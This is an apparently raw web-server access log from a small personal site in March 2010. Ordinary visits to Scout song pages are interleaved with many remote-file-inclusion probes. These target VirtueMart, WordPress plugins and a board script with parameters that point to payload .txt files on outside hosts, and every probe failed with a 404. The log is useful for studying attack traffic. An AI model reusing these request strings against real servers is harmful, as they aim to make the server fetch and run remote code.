66.227.163.32 - - [01/Mar/2010:21:23:14 -0800] "GET /~daveh/sean/song/index.html HTTP/1.1" 404 307 /home/users/d/daveh/public_html/sean/song/index.html "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" 0 www.accesscom.com
67.195.115.58 - - [01/Mar/2010:21:26:50 -0800] "GET /~daveh/?N=D HTTP/1.0" 200 2775 /home/users/d/daveh/public_html/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
71.83.228.41 - - [01/Mar/2010:21:28:41 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?q=scout+songs&btnG=Search&hl=en&sa=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" 0 www.accesscom.com
71.83.228.41 - - [01/Mar/2010:21:28:42 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" 0 www.accesscom.com
67.195.115.58 - - [01/Mar/2010:21:37:21 -0800] "GET /~daveh/case/?S=A HTTP/1.0" 200 1913 /home/users/d/daveh/public_html/case/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
67.192.48.157 - - [01/Mar/2010:22:06:35 -0800] "GET /~daveh/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://sunderguild.com/guildbank/templates/cache/readme.txt??? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs//components "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" 0 www.accesscom.com
85.233.162.101 - - [01/Mar/2010:22:07:32 -0800] "GET /~daveh/logs/access.log%20%20///path/linkadmin.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 325 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [01/Mar/2010:22:07:32 -0800] "GET /~daveh/logs///path/linkadmin.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/logs///path "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [01/Mar/2010:22:07:32 -0800] "GET /~daveh///path/linkadmin.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 307 /home/users/d/daveh/public_html/path "-" "Mozilla/5.0" 0 www.accesscom.com
68.204.62.50 - - [01/Mar/2010:22:14:39 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?q=Cub+Scout+Pirate+day&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729) FBSMTWB" 0 www.accesscom.com
68.204.62.50 - - [01/Mar/2010:22:14:39 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729) FBSMTWB" 0 www.accesscom.com
68.204.62.50 - - [01/Mar/2010:22:15:01 -0800] "GET /~daveh/sean/song/pbsong4.html HTTP/1.1" 200 59712 /home/users/d/daveh/public_html/sean/song/pbsong4.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729) FBSMTWB" 0 www.accesscom.com
207.46.204.237 - - [01/Mar/2010:22:15:13 -0800] "GET /~daveh/sean/song/pbsong5.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong5.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:22:15:31 -0800] "GET /~daveh/logs/access.log/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 321 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:22:15:31 -0800] "GET /~daveh/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 305 /home/users/d/daveh/public_html/admin_settings.php "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:22:15:32 -0800] "GET /~daveh/logs/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs/admin_settings.php "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [01/Mar/2010:22:17:20 -0800] "GET /~daveh/logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [01/Mar/2010:22:17:20 -0800] "GET /~daveh/logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 355 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [01/Mar/2010:22:17:20 -0800] "GET /~daveh/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 337 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [01/Mar/2010:22:19:58 -0800] "GET /~daveh/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 337 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [01/Mar/2010:22:19:58 -0800] "GET /~daveh/logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 355 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [01/Mar/2010:22:19:58 -0800] "GET /~daveh/logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
71.127.190.152 - - [01/Mar/2010:22:21:01 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?hl=en&q=titantic+scouts+song&aq=f&aqi=&aql=&oq=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" 0 www.accesscom.com
71.127.190.152 - - [01/Mar/2010:22:21:01 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" 0 www.accesscom.com
71.127.190.152 - - [01/Mar/2010:22:21:15 -0800] "GET /~daveh/sean/song/pbsong3.html HTTP/1.1" 200 65639 /home/users/d/daveh/public_html/sean/song/pbsong3.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" 1 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:22:23:00 -0800] "GET /~daveh/logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:22:23:00 -0800] "GET /~daveh/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 337 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:22:23:00 -0800] "GET /~daveh/logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 355 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
93.187.203.171 - - [01/Mar/2010:22:23:17 -0800] "GET /~daveh/logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
93.187.203.171 - - [01/Mar/2010:22:23:17 -0800] "GET /~daveh/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 337 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
93.187.203.171 - - [01/Mar/2010:22:23:17 -0800] "GET /~daveh/logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 355 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
209.172.33.230 - - [01/Mar/2010:22:23:42 -0800] "GET /~daveh//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 338 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
209.172.33.230 - - [01/Mar/2010:22:23:42 -0800] "GET /~daveh/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs//components "-" "Mozilla/5.0" 0 www.accesscom.com
209.172.33.230 - - [01/Mar/2010:22:23:42 -0800] "GET /~daveh/logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 356 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
93.187.203.171 - - [01/Mar/2010:22:24:47 -0800] "GET /~daveh/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 337 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
93.187.203.171 - - [01/Mar/2010:22:24:52 -0800] "GET /~daveh/logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
93.187.203.171 - - [01/Mar/2010:22:24:52 -0800] "GET /~daveh/logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 355 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [01/Mar/2010:22:25:46 -0800] "GET /~daveh/logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 353 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
211.230.148.90 - - [01/Mar/2010:22:26:56 -0800] "GET /~daveh//bbs/bbs/write_update.php//board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt??? HTTP/1.1" 404 363 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
211.230.148.90 - - [01/Mar/2010:22:26:56 -0800] "GET /~daveh/logs/access.log//bbs/bbs/write_update.php//board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt??? HTTP/1.1" 404 379 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
211.230.148.90 - - [01/Mar/2010:22:26:57 -0800] "GET /~daveh/logs//bbs/bbs/write_update.php//board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt??? HTTP/1.1" 404 368 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
67.195.37.176 - - [01/Mar/2010:22:27:11 -0800] "GET /~daveh/logs/Feb03.html HTTP/1.0" 200 11935 /home/users/d/daveh/public_html/logs/Feb03.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
194.39.140.100 - - [01/Mar/2010:22:28:55 -0800] "GET /~daveh/logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 353 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 1 www.accesscom.com
68.145.218.6 - - [01/Mar/2010:22:31:05 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://dragon.sleepdeprived.ca/songbook/links.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" 0 www.accesscom.com
68.145.218.6 - - [01/Mar/2010:22:31:06 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" 0 www.accesscom.com
68.145.218.6 - - [01/Mar/2010:22:31:41 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 200 41905 /home/users/d/daveh/public_html/sean/song/pbsong1.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:22:32:44 -0800] "GET /~daveh/logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 353 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
68.145.218.6 - - [01/Mar/2010:22:32:50 -0800] "GET /~daveh/sean/song/pbsong4.html HTTP/1.1" 200 59712 /home/users/d/daveh/public_html/sean/song/pbsong4.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" 0 www.accesscom.com
207.46.204.240 - - [01/Mar/2010:22:33:12 -0800] "GET /~daveh/sean/song/index.html HTTP/1.1" 404 307 /home/users/d/daveh/public_html/sean/song/index.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
68.145.218.6 - - [01/Mar/2010:22:34:07 -0800] "GET /~daveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" 0 www.accesscom.com
65.55.230.26 - - [01/Mar/2010:22:34:07 -0800] "GET /~daveh/martin/images/DSC00028.jpg HTTP/1.1" 200 110642 /home/users/d/daveh/public_html/martin/images/DSC00028.jpg "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
65.55.230.26 - - [01/Mar/2010:22:34:08 -0800] "GET /~daveh/martin/pages/DSC00028.htm HTTP/1.1" 200 1097 /home/users/d/daveh/public_html/martin/pages/DSC00028.htm "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
68.145.218.6 - - [01/Mar/2010:22:34:55 -0800] "GET /~daveh/sean/song/pbsong3.html HTTP/1.1" 200 65639 /home/users/d/daveh/public_html/sean/song/pbsong3.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:22:35:40 -0800] "GET /~daveh//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 349 /home/users/d/daveh/public_html/wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:22:35:49 -0800] "GET /~daveh/logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs//wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:22:35:49 -0800] "GET /~daveh/logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 367 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
218.208.78.90 - - [01/Mar/2010:22:36:39 -0800] "GET /~daveh//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 338 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
218.208.78.90 - - [01/Mar/2010:22:36:39 -0800] "GET /~daveh/logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs//components "-" "Mozilla/5.0" 0 www.accesscom.com
218.208.78.90 - - [01/Mar/2010:22:36:41 -0800] "GET /~daveh/logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 356 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:22:39:44 -0800] "GET /~daveh//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 349 /home/users/d/daveh/public_html/wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:22:39:44 -0800] "GET /~daveh/logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs//wp-content "-" "Mozilla/5.0" 0 www.accesscom.com
58.150.99.144 - - [01/Mar/2010:22:39:44 -0800] "GET /~daveh/logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 365 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
221.141.1.113 - - [01/Mar/2010:22:43:20 -0800] "GET /~daveh///bbs//write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
221.141.1.113 - - [01/Mar/2010:22:43:20 -0800] "GET /~daveh/logs///bbs//write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 315 /home/users/d/daveh/public_html/logs///bbs "-" "Mozilla/5.0" 0 www.accesscom.com
221.141.1.113 - - [01/Mar/2010:22:43:21 -0800] "GET /~daveh/logs/access.log///bbs//write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 326 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
218.208.78.90 - - [01/Mar/2010:22:48:56 -0800] "GET /~daveh/logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
93.187.203.171 - - [01/Mar/2010:22:54:06 -0800] "GET /~daveh/logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 353 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
24.108.201.113 - - [01/Mar/2010:22:55:21 -0800] "GET /~daveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "http://www.google.ca/url?sa=t&source=web&ct=res&cd=12&ved=0CAcQFjABOAo&url=http%3A%2F%2Fwww.accesscom.com%2F~daveh%2Fsean%2Fsong%2Fpbsong2.html&rct=j&q=we+don%27t+have+to+fly+over+Germany+song&ei=T7aMS9CUB5GcsgOag6irAw&usg=AFQjCNEdpZNDbhwsrCENbfLVL8oNe6tBaw" "Mozilla/4.0 (compatible; MSIE 8.0; Wi
62.140.23.24 - - [01/Mar/2010:23:19:05 -0800] "GET /~daveh////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:23:19:05 -0800] "GET /~daveh/logs/access.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 358 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:23:19:07 -0800] "GET /~daveh/logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 345 /home/users/d/daveh/public_html/logs////administrator "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:23:19:18 -0800] "GET /~daveh////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:23:19:18 -0800] "GET /~daveh/logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 345 /home/users/d/daveh/public_html/logs////administrator "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:23:19:19 -0800] "GET /~daveh/logs/access.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 358 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:23:25:21 -0800] "GET /~daveh/logs/access.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 356 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [01/Mar/2010:23:26:25 -0800] "GET /~daveh/logs/access.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 356 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
193.47.80.43 - - [01/Mar/2010:23:47:29 -0800] "GET /~daveh/sean/song/pbsong5.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong5.html "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.accesscom.com
208.115.111.248 - - [01/Mar/2010:23:52:42 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.accesscom.com
66.249.71.110 - - [02/Mar/2010:00:07:18 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong1.html "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.accesscom.com
67.195.37.176 - - [02/Mar/2010:00:14:56 -0800] "GET /~daveh/martin/pages/DSC00027.htm HTTP/1.0" 200 1097 /home/users/d/daveh/public_html/martin/pages/DSC00027.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
67.195.37.176 - - [02/Mar/2010:00:15:45 -0800] "GET /~daveh/logs/Oct02.html HTTP/1.0" 200 14717 /home/users/d/daveh/public_html/logs/Oct02.html "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
203.59.136.42 - - [02/Mar/2010:00:15:56 -0800] "GET /~daveh/logs//index.php/?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//index.php "-" "Mozilla/5.0" 0 www.accesscom.com
203.59.136.42 - - [02/Mar/2010:00:15:56 -0800] "GET /~daveh//index.php/?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
203.59.136.42 - - [02/Mar/2010:00:15:56 -0800] "GET /~daveh/logs/access.log%20%20//index.php/?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 316 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:00:18:58 -0800] "GET /~daveh/logs//index.php/?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//index.php "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:00:18:58 -0800] "GET /~daveh//index.php/?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:00:18:58 -0800] "GET /~daveh/logs/access.log%20%20//index.php/?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 316 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:00:19:30 -0800] "GET /~daveh//index.php/?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/index.php "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:00:19:30 -0800] "GET /~daveh/logs//index.php/?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//index.php "-" "Mozilla/5.0" 0 www.accesscom.com
85.233.162.101 - - [02/Mar/2010:00:19:30 -0800] "GET /~daveh/logs/access.log%20%20//index.php/?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 316 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
